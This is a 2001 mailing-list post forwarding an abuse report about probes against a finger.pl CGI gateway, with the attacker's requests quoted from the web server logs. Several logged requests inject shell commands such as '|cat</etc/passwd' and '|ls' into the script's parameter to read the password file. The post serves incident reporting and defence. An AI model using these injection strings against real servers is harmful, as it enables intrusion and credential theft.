Security Incidents mailing list archives

[no subject]

From: Len Sassaman <rabbi () QUICKIE NET>
Date: Wed, 9 May 2001 16:41:19 -0700
I sent the following email to several CNET contacts last week regarding
atttempts to obtain one of my server's /etc/passwd file. I got no response
from CNET, and I am curious to know if anyone else is being probed in this
way.

--Len.

---------- Forwarded message ----------
Date: Thu, 3 May 2001 12:42:45 -0700 (PDT)
From: abuse () deor org
To: hostmaster () cnet com, domain-admin () cnet com
Cc: sashap () cnet com

Dear CNET Admins,

It appears that a user on your network is attempting to exploit a
vulnerability in HTTP-to-finger gateways. I discovered, in the below
quoted logs, what looks to be an attempt to get our webserver to execute
local commands and print the output to the web page. (Your user searched
google.com for the finger.pl script, then attempted to view our passwd
file and directory listings, ostensibly so that he could crack legitimate
users' passwords and gain shell access to the system.).

While this individual was not successful in his attempt on our system, he
may be doing this to other systems as well.

Please let me know what action you are taking to prevent this from
occurring in the future. Also, please preserve all logs, IP assignments,
and other data you have pertaining to this incident while it is being
investigated. I would appreciate a response today, if possible.

Thank you,

Len Sassaman



86-241.cnet.com - - [02/May/2001:17:15:11 -0700] "GET
/cgi-bin/finger.pl?rabbi HTTP/1.1" 200 37040
"http://www.google.com/search?as_q=&num=10&btnG=Google+Search&as_epq=finger.pl&as_oq=&as_eq=&as_occt=url&lr=&as_dt=i&as_sitesearch=&safe=off";
"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:15:23 -0700] "GET /cgi-bin/finger.pl?
HTTP/1.1" 200 357 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT
5.0)"
86-241.cnet.com - - [02/May/2001:17:15:40 -0700] "GET
/cgi-bin/finger.pl?|cat</etc/passwd HTTP/1.1" 200 189 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:15:47 -0700] "GET
/cgi-bin/finger.pl?;cat</etc/passwd HTTP/1.1" 200 189 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:15:56 -0700] "GET
/cgi-bin/finger.pl?|ls HTTP/1.1" 200 176 "-" "Mozilla/4.0 (compatible;
MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:16:10 -0700] "GET
/cgi-bin/finger.pl?user@host HTTP/1.1" 200 140 "-" "Mozilla/4.0
(compatible; MSIE 5.01; Windows NT 5.0)"
Current thread:

[no subject] Len Sassaman (May 10)